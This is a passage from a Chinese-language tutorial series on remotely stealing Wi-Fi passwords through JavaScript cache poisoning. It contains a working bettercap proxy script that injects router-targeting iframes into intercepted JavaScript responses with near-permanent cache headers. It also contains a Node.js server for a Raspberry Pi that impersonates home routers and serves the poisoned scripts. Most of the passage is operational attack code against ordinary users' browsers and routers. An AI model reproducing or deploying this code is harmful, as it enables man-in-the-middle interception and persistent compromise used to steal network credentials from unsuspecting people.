利用JavaScript缓存远程窃取Wi-Fi密码的思路详解(6)
嵌入这段代码的页面应该缓存在客户端的浏览器中,并根据路由器的IP地址发送。现在让我们暂时把这些代码放一边,让我们讨论一下缓存这段代码的网络配置。
正如我刚才所说,上面的JavaScript代码将缓存为来自路由器的IP地址,并将加载到由另一段JavaScript创建的iframe中,第一段JavaScript代码是我在客户端每次请求JavaScript的时候在每个页面中注入的。要完成拦截和注入,我使用了bettercap。Bettercap允许创建HTTP代理模块,可用于对HTTP代理进行编程并告诉它如何操作。例如,可以在将响应传递给客户端之前拦截响应,并决定注入什么,何时注入以及如何注入。因此,我在JavaScript中创建了一个简单的代码,它在bettercap中加载并执行注入。
// list of common router's IP .. which definitely requires improvement
var routers = ["192.168.1.1", "192.168.0.1"]
// this function is called when the response is
// received and can be sent back to the client
function onResponse(req, res) {
// inject only responses containing JavaScript
if(res.ContentType.indexOf('application/javascript') == 0 ){
console.log("caching");
console.log(req.Hostname)
var body = res.ReadBody();
// set caching header
res.SetHeader("Cache-Control","max-age=86400");
res.SetHeader("Content-Type","text/html");
res.SetHeader("Cache-Control","public, max-age=99936000");
res.SetHeader("Expires","Wed, 2 Nov 2050 10:00:00 GMT");
res.SetHeader("Last-Modified","Wed, 2 Nov 1988 10:00:00 GMT");
res.SetHeader("Access-Control-Allow-Origin:","*");
// set payload
var payload = "document.addEventListener("DOMContentLoaded", function(event){n";
for(var i=0; i < routers.length; i++){
payload = payload + "var ifrm = document.createElement('iframe');nifrm.setAttribute('src', 'http://"+routers[i]+"');ifrm.style.width = '640px';ifrm.style.height = '480px';ndocument.body.appendChild(ifrm);n";
}
payload = payload + "});";
res.Body = body + payload;
}
}
有一点值得注意的是,上面的代码中,JavaScript有效载荷会尝试为routers数组中的每个IP 加载一个iframe。这是因为家庭路由器的IP可能配置有所不同。这意味着Raspberry必须响应不同子网上的不同IP。为此,我只需向Raspberry的无线接口添加更多IP就行了。这样,无论加载iframe的代码何时执行,都会对公共路由器的IP地址执行请求,并且Raspberry的无线接口可以伪装成路由器,响应这些请求并缓存我想要的任何内容。
最后,我需要在Raspberry上搭建一个Web服务器,它可以监听无线接口并缓存攻击路由器的JavaScript代码。我先用Nginx做了一些测试,以确保这个想法有效,但最后我选择了Node.JS,主要是因为我还没有使用过Node.JS的HTTP服务器。
var http = require("http");
var routers = ["192.168.0.1/","192.168.1.1/","192.168.1.90/"]
var fs = require('fs');
// load the index web page
var index = fs.readFileSync("./www/index.html");
// load the JavaScript file, which might be more than one
// when support for other router is implemented
var jsob = fs.readdirSync('./www/js');
var repobj = {}
for (var i in jsob){
// placing a / at the beginning is a bit of a lazy move
repobj["/"+jsob[i]] = fs.readFileSync('./www/js/' + jsob[i]);
}
var server = http.createServer(function(request, response) {
var url = request.headers.host + request.url;
console.log('Request: ' + url);
console.log("REQUEST URL" + request.url);
console.log(request.headers);
var headers = {
"Content-Type": "text/html",
"Server": "dribble",
"Cache-Control": "public, max-age=99936000",
"Expires": "Wed, 2 Nov 2050 10:00:00 GMT",
"Last-Modified": "Wed, 2 Nov 1988 10:00:00 GMT",
"Access-Control-Allow-Origin": "*"
};
// Cache the index page
if (routers.includes(url))
{
console.log("cache until the end of time");
response.writeHead(200, headers);
response.write(index);
response.end();
return;
}
// cache the JavaScript payload
else if (repobj[request.url]){
console.log("cache JS until the end of time");
headers["Content-Type"] = "application/javascript";
response.writeHead(200, headers);
response.write(repobj[request.url]);
response.end();
return;
}
});
// listen on port 80
server.listen(80);
内容版权声明:除非注明,否则皆为本站原创文章。